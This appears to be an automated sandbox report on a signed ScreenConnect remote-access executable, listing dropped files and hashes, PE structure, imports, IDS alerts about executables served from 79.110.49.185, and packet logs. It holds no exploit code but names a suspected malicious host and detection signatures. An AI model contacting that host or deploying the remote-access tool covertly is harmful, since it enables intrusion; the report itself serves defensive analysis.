                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):87
                                                                                                                                                                                                                                                      Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                      MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                      SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                      SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                      SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1121
                                                                                                                                                                                                                                                      Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                      MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                      SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                      SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                      SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.296013485969038
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:W41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+WQmBMZJh1Vj+:H1/YCW2AoQ0Ni0QwMHrVi
                                                                                                                                                                                                                                                      MD5:397202F68F9AD643708425969CD4E197
                                                                                                                                                                                                                                                      SHA1:00D7C611447EEBF77A144845FF7B22AA63065991
                                                                                                                                                                                                                                                      SHA-256:00EA7CCEC1145A102052C75D8120E2ADBD94500B3D39A3EAB407ECA85DFBE2BD
                                                                                                                                                                                                                                                      SHA-512:7A7D245C31BE492E8B93A0286A41422EBEE6C5B73E87D30C76ADE2D3B75DC716E1EEC6816E2FF06B8626D647FCE6B76B262F8EDD63BFACBC186821711337569A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..!.'..............................................................................................................................................................................................................................................................................................................................................c...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):6.515209803080516
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:Qjq85KfhBC.exe
                                                                                                                                                                                                                                                      File size:83'368 bytes
                                                                                                                                                                                                                                                      MD5:fdb2a84ffcb57c0bfbbf0aadb9bad790
                                                                                                                                                                                                                                                      SHA1:f3333b1aff0e5cafd2bbb96457165f231d0dc73e
                                                                                                                                                                                                                                                      SHA256:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d
                                                                                                                                                                                                                                                      SHA512:6292d9f91891b00f8376e53444e29dc818bc72e6e756db4a1d45e037c5d35b59b453e860827026fdef7724173d775f16c0be74656e62c16f4c41178207ef532c
                                                                                                                                                                                                                                                      SSDEEP:1536:GoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYC79xh:OenkyfPAwiMq0RqRfbayZJYYCh
                                                                                                                                                                                                                                                      TLSH:73835B53B5D18875E9720D3118B1E9B4593FBE110EA48DAF3398422A0F351D1AE3AE7B
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Entrypoint:0x401489
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                      Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                      Error Number:0
                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                      • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                      Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      call 00007F9F69139E8Ah
                                                                                                                                                                                                                                                      jmp 00007F9F6913993Fh
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                                      call dword ptr [0040B048h]
                                                                                                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      call dword ptr [0040B044h]
                                                                                                                                                                                                                                                      push C0000409h
                                                                                                                                                                                                                                                      call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                      call dword ptr [0040B050h]
                                                                                                                                                                                                                                                      pop ebp
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      sub esp, 00000324h
                                                                                                                                                                                                                                                      push 00000017h
                                                                                                                                                                                                                                                      call dword ptr [0040B054h]
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F9F69139AC7h
                                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                      int 29h
                                                                                                                                                                                                                                                      mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                      mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                      mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                      mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                      mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                      mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                      mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                      mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                      mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                      mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                      mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                      mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                      pushfd
                                                                                                                                                                                                                                                      pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                      mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2da8
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rdata0xb0000x5d580x5e003a86bd3d8ffe94b1ebad64876c0f831cFalse0.4178025265957447Applesoft BASIC program data, first line number 14.842507933211541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                      CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-10-25T19:27:26.419007+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049719TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:28.274313+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049720TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:33.433121+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049725TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:35.115074+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049726TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:37.540288+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049727TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:43.542452+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049728TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:45.189390+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049729TCP
                                                                                                                                                                                                                                                      2024-10-25T19:27:48.935077+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content179.110.49.185443192.168.2.1049730TCP

                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.287323952 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.287374973 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.287440062 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.317925930 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.317948103 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.156851053 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.156961918 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.160326004 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.160346985 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.160661936 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.209918022 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.216928005 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.259334087 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631174088 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631273031 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631295919 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631345034 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631361961 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631405115 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631419897 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631442070 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631444931 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631469011 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.631504059 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.748323917 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.748353004 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.748482943 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.748517990 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.748749018 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863675117 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863699913 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863746881 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863776922 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863792896 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.863816023 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.979993105 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.980017900 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.980077028 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.980102062 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.980125904 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:17.980145931 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.096313953 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.096349001 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.096422911 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.096437931 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.096478939 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.212953091 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.212984085 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.213078022 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.213103056 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.216418982 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329080105 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329104900 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329231977 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329252005 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329638004 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329689980 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329696894 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.329720020 CEST4434970279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.332869053 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.350081921 CEST49702443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.967407942 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.967451096 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.967519999 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.967752934 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.967765093 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:19.813237906 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:19.832952976 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:19.832972050 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194356918 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194389105 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194406033 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194544077 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194562912 CEST4434970879.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194760084 CEST49708443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.194844961 CEST4434970879.110.49.185192.168.2.10
